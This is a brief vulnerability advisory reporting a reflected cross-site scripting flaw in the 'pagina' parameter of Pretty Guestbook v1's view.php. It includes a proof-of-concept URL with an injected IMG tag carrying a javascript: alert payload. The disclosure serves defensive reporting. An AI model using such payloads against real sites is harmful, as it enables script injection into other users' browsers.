Pretty Guestbook v1 suffers from XSS in view.php
f07f3f02c78b7383cedef740f51ac07e9ba8031ba638a917030356e040329bb2
Homepage:
http://www.tuttophp.altervista.org/main.php
Description:
Text-based guestbook with the following features: - Data storing on text file - Paging of messages on screen - Blockage of messages with words too long into - Blockage of messages with both html tags(<>) - Validity-checking of email address
Effected files:
view.php
XSS achived by URL Injection of pagina variable:
http://www.example.com/prettyguest-ing/view.php?pagina=1<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>